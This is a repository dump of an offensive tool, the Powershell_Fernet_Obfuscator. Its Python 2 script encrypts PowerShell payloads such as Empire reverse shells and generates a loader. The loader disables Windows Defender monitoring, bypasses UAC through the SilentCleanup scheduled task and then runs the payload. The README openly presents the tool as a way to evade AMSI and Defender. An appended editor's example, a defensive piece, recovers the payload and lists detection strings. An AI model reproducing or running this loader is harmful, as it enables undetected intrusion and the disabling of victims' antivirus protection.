├── empire_fernet_ps.png
├── README.md
├── empirepay.ps1
└── pspyfernet_obs.py

/empire_fernet_ps.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1captainnemo1/Powershell_Fernet_Obfuscator/HEAD/empire_fernet_ps.png
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# Powershell_Fernet_Obfuscator

A Python script that Fernet-encrypts any non-FUD PowerShell payload and generates a ready-to-use Python loader (described by the author as FUD) that decrypts and runs the payload at run time.

![Powershell_Fernet_Obfuscator](empire_fernet_ps.png)

This is a tool to obfuscate any existing non-FUD PowerShell payload (Empire, Unicorn, SET PowerShell vector) and, in the process, create a ready-to-use Python script that can be used to perform different tasks.


In this example I have shown how a non-FUD Empire PowerShell reverse-shell payload can be obfuscated to bypass the AMSI.dll check and evade Windows Defender.

What the generated loader actually does (see pspyfernet_obs.py below): it decrypts the Fernet token at run time and hands the plaintext to `powershell.exe -Command`. Before that, if the process is a member of the local Administrators group (SID S-1-5-32-544), it runs `Set-MpPreference` to turn off Defender real-time monitoring, script scanning, IOAV protection and the intrusion prevention system; otherwise it tries to relaunch itself elevated through the `\Microsoft\Windows\DiskCleanup\SilentCleanup` scheduled task by planting `windir` under `HKCU:\Environment`. Note that the Fernet key is written into the generated script directly above the ciphertext, so this is obfuscation at rest, not protection: anyone holding the file can recover the original payload.


VirusTotal detection results: https://www.virustotal.com/gui/file/8b9ec6a026f49d4db1d89f6f5060857eb335a8decbd04642a13c28220600aac3/detection


Please do not upload to VirusTotal.


Usage: `python pspyfernet_obs.py nonfudpspayload.ps1` (Python 2; needs the `cryptography` package)


This writes the Fernet-encrypted payload to `_PSRawPayload<N>.txt` and, if you answer `Y` at the prompt, the final Python loader to `PSFinalPayload<N>.py`.


Watch the YouTube video for clarification.

--------------------------------------------------------------------------------

/empirepay.ps1:
--------------------------------------------------------------------------------
powershell -noP -sta -w 1 -enc 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
--------------------------------------------------------------------------------

/pspyfernet_obs.py:
--------------------------------------------------------------------------------
#!/usr/local/bin/python
# coding: latin-1
#@Author :#Captain_Nemo
# Python 2 script (print statements, raw_input, str/bytes conflation); needs the
# third-party "cryptography" package.

from cryptography.fernet import Fernet
import os
import sys
import random
import time
import subprocess

class bcolors:
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    WARNING = '\033[93m'
    WHITE = '\033[97m'
    ERROR = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


# Read the raw PowerShell payload given as the first argument.
with open(sys.argv[1], 'r+') as f:
    contents = f.read()
banner = '''
█████████████████████████████
█████████████████████████████
████ ▄▄▄▄▄ █ ▄ █ █ ▄▄▄▄▄ ████
████ █ █ █ ▀▀ ██ █ █ ████
████ █▄▄▄█ █▀▀█▀ █ █▄▄▄█ ████
████▄▄▄▄▄▄▄█▄▀ █▄█▄▄▄▄▄▄▄████
████▄ █▀▄ ▄██▄██▄██▄▀▄▄▄ ████
████▀▀▄▄▀ ▄▀▀ █▀█ █▀▀▀▀████
████████▄▄▄▄▀█▀█ ▄ ▀█ █████
████ ▄▄▄▄▄ █▀▄▄ █▀█▀ ▀█▄████
████ █ █ █▄█▀ ▄▀▄█▀▀▀ ▀████
████ █▄▄▄█ █▀▄█ ▄█ █▄▄▀█▀████
████▄▄▄▄▄▄▄█▄▄▄███▄██▄█▄▄████
█████████████████████████████
█████████████████████████████

'''
print banner.decode('utf-8')

print bcolors.BOLD + bcolors.WHITE + " [+] Author :#Captain_Nemo"
print bcolors.BOLD + bcolors.WHITE + " [+] HACK-ATHON BOOK OF WISDOM "
print bcolors.BOLD + bcolors.WHITE + " [+] YOUTUBE CHANNEL : https://www.youtube.com/channel/UCA1eZ38TvjtyhpLtcZ9UHEQ"
print bcolors.BOLD + bcolors.WHITE + " [+] FACEBOOK : https://www.facebook.com/Hack-Athon-BOOK-of-Wisdom-1258144607678680"
print bcolors.BOLD + bcolors.WHITE + " [+] TWITTER : https://twitter.com/AthonOf"
print bcolors.BOLD + bcolors.WHITE + " [+] GITHUB : https://github.com/1captainnemo1"

#time.sleep(3)

print "\n\n\n"

print bcolors.BOLD + bcolors.WHITE + "[+] This Module will attempt to Obfuscate powershell Attack Vectors"

print bcolors.BLUE + "[+] Raw payload"
print " ============================================================================================="
print contents
print " ============================================================================================="
# A single Fernet key (32 random bytes, urlsafe-base64 encoded); it is later
# written in clear into the generated loader next to the ciphertext.
print bcolors.ERROR + bcolors.BOLD + "[+] Generating Fernet Key"
key = Fernet.generate_key()
print bcolors.BOLD + bcolors.WHITE + "[+] Key = " + key
print bcolors.WHITE + "[+] Please make note of the Key for decryption"

print bcolors.BOLD + "[+] Generating Fernet Object....please wait"
f = Fernet(key)
print bcolors.BOLD + bcolors.WHITE + "[+] Fernet Object Generated at :"
print f
print bcolors.ERROR + bcolors.BOLD + "[+] Encrypting Payload"
time.sleep(2)
print bcolors.BOLD + bcolors.WHITE + "================================================================================="
enc_payload = f.encrypt(contents)
print bcolors.BOLD + bcolors.WHITE + "[+] Encrypted Payload : " + enc_payload
print bcolors.BOLD + bcolors.WHITE + "================================================================================="

print bcolors.ERROR + bcolors.BOLD + "[+] Writing RAW payload to file, Please wait"
Filename = "_PSRawPayload%i"%random.randint(1,10000000001)+".txt"
#print Filename # bookmark

# Write the Fernet token (not the plaintext) to the randomly named file.
f1 = open(Filename, "a")
f1.write(enc_payload)
f1.close()

print bcolors.BOLD + bcolors.WHITE + "[+] Raw Encrypted Payload written to :" + f1.name

print bcolors.BLUE + bcolors.BOLD + "[+] Do You want to continue generating the Executable payload (Y/N)"
decision = str(raw_input("enter Y or N\n"))

if decision == 'N':
    print bcolors.BOLD + bcolors.WHITE + "[+] Have a nice day !!"
    print bcolors.BOLD + bcolors.WHITE + "[+] DO NOT UPLOAD TO VIRUSTOTAL !!!"
    sys.exit(0)
elif decision == 'Y':

    # Create final Obfuscated Executable Python payload.
    # The loader embeds the key and the token as string literals, decrypts at
    # run time and passes the plaintext to powershell.exe -Command. Before that
    # it disables Defender features via Set-MpPreference when running as a
    # member of Administrators (S-1-5-32-544), otherwise it tries to relaunch
    # elevated through the SilentCleanup scheduled task.
    print bcolors.BOLD + bcolors.WHITE + "[+] Generating Final Obfuscated python Payload, Please wait"
    time.sleep(2)
    final_payload = open("PSFinalPayload%i"%random.randint(1,10000000001)+".py", "w")
    final_payload.write("""
from cryptography.fernet import Fernet
import os
import sys
import subprocess
import time

key = """ + "'" + key + "'")
    final_payload.write("""
f_obj= Fernet(key)
enc_pay =""" + "'" + enc_payload + "'")
    final_payload.write("""

#Disable Notification

#subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HKCU:\Software\Policies\Microsoft\Windows\Explorer -Name DisableNotificationCenter -Type #DWord -Value 1 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-#ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}])

#subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HCKU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications -Name ToastEnabled -#Type DWord -Value 0 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" #Set-ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}])
#time.sleep(20)

#Disable AV
subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', 'if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")){Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true}else{$registryPath = "HKCU:\Environment";$Name = "windir" ;$Value = "powershell -ep bypass -w h $PSCommandPath";Set-ItemProperty -Path $registryPath -Name $name -Value $Value;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null ; Remove-ItemProperty -Path $registryPath -Name $name}'])

time.sleep(90)

subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', f_obj.decrypt(enc_pay).decode()])

time.sleep(90)

#Enable AV
subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', 'if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")){Set-MpPreference -DisableIntrusionPreventionSystem $false -DisableIOAVProtection $false -DisableRealtimeMonitoring $false -DisableScriptScanning $false}else{$registryPath = "HKCU:\Environment";$Name = "windir" ;$Value = "powershell -ep bypass -w h $PSCommandPath";Set-ItemProperty -Path $registryPath -Name $name -Value $Value;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null ; Remove-ItemProperty -Path $registryPath -Name $name}'])

#Enable notification

#subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HKCU:\Software\Policies\Microsoft\Windows\Explorer -Name DisableNotificationCenter -Type #DWord -Value 0 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-#ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}])

#subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HCKU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications -Name ToastEnabled -#Type DWord -Value 1 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" #Set-ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}])

""")
    final_payload.close()
    print bcolors.BOLD + bcolors.WHITE + "[+] Final Encrypted Powershell Python Payload written to : " + final_payload.name
    print bcolors.BLUE + bcolors.BOLD + "[+] HACK THE MULTIVERSE "
    decr = 5
    while True:
        print bcolors.ERROR + bcolors.BOLD + "[+] DO NOT UPLOAD TO VIRUSTOTAL"
        decr = decr-1
        if(decr <=0):
            break
    sys.exit(0)
else:
    # Print the usage error before exiting (the original exited first, so the
    # message was never shown).
    print bcolors.ERROR + bcolors.BOLD + "[+] Respond in Y or N ONLY"
    sys.exit(0)
sys.exit(0)
--------------------------------------------------------------------------------
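
The following is an added example (editor's code, not part of this repository) showing why the Fernet step in pspyfernet_obs.py is obfuscation at rest rather than protection: the generated PSFinalPayload*.py carries the Fernet key on the line immediately above the token, so an analyst can pull both back out, decrypt the original command, decode its `-enc` argument (base64 of UTF-16LE) and note the Defender-tampering strings the loader contains. The loader text it parses is constructed inline in the same `key = '...'` / `enc_pay ='...'` layout the generator writes; the regexes, function names, the indicator list and the harmless sample command are the editor's assumptions.

```python
"""Editor's example: recover the PowerShell command from a PSFinalPayload-style loader.

The loader written by pspyfernet_obs.py embeds the Fernet key one line above the
Fernet token, so whoever holds the file holds the key. Regex/function names, the
indicator list and the sample loader below are the editor's constructions.
"""
import base64
import re

from cryptography.fernet import Fernet, InvalidToken

# Layout written by the generator:  key = '<44-char urlsafe b64>'  /  enc_pay ='gAAAA...'
KEY_RE = re.compile(r"^key\s*=\s*'([A-Za-z0-9_\-=]{44})'", re.M)
TOKEN_RE = re.compile(r"^enc_pay\s*=\s*'(gAAAA[A-Za-z0-9_\-=]+)'", re.M)
# powershell -e / -ec / -enc / -EncodedCommand <base64 of a UTF-16LE script>
ENC_RE = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Strings the generated loader uses to turn Defender off or to relaunch elevated.
TAMPER_INDICATORS = (
    "Set-MpPreference",
    "-DisableRealtimeMonitoring",
    "-DisableScriptScanning",
    "-DisableIOAVProtection",
    "-DisableIntrusionPreventionSystem",
    "DiskCleanup\\SilentCleanup",
    "HKCU:\\Environment",
)

# Constructed sample command in the empirepay.ps1 shape (a harmless Write-Host inside).
SAMPLE_INNER = "Write-Host 'constructed sample'"
SAMPLE_PS = "powershell -noP -sta -w 1 -enc " + base64.b64encode(
    SAMPLE_INNER.encode("utf-16-le")).decode()


def build_sample_loader(ps_command, key=None):
    """Construct loader text in the layout pspyfernet_obs.py writes (a stand-in, not a real artefact)."""
    key = key or Fernet.generate_key()
    token = Fernet(key).encrypt(ps_command.encode())
    # Shortened copy of the loader's "Disable AV" command (constructed).
    defender_off = (
        "if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match \"S-1-5-32-544\"))"
        "{Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true}"
        "else{Set-ItemProperty -Path HKCU:\\Environment -Name windir -Value x;"
        "schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I}"
    )
    lines = [
        "from cryptography.fernet import Fernet",
        "import subprocess",
        "",
        "key = '%s'" % key.decode(),
        "f_obj= Fernet(key)",
        "enc_pay ='%s'" % token.decode(),
        "",
        "#Disable AV",
        "subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', '%s'])" % defender_off,
        "",
        "subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', f_obj.decrypt(enc_pay).decode()])",
    ]
    return "\n".join(lines) + "\n"


def extract_key_and_token(loader_src):
    """Pull the embedded key and token out of loader text; None if that layout is absent."""
    k, t = KEY_RE.search(loader_src), TOKEN_RE.search(loader_src)
    if not (k and t):
        return None
    return k.group(1).encode(), t.group(1).encode()


def recover_command(loader_src):
    """Decrypt the embedded token with the embedded key (the loader checks no TTL, so neither do we)."""
    found = extract_key_and_token(loader_src)
    if found is None:
        return None
    key, token = found
    try:
        return Fernet(key).decrypt(token).decode()
    except (InvalidToken, ValueError):
        return None


def decode_encoded_command(command):
    """Decode a powershell -enc argument (base64 of UTF-16LE); None if there is none."""
    m = ENC_RE.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def tamper_indicators(loader_src):
    """Which Defender-tampering / elevation strings from the generated loader are present."""
    return [s for s in TAMPER_INDICATORS if s in loader_src]


if __name__ == "__main__":
    loader = build_sample_loader(SAMPLE_PS)
    cmd = recover_command(loader)
    print("recovered command :", cmd)
    print("decoded -enc      :", decode_encoded_command(cmd))
    print("tamper indicators :", tamper_indicators(loader))
```

Run it against a real PSFinalPayload*.py by reading the file into `recover_command`; the same three regexes are what a YARA or EDR content rule would key on, since the `key = '...'` / `enc_pay ='gAAAA...'` pair and the `Set-MpPreference -Disable...` string are constant across every loader this generator produces.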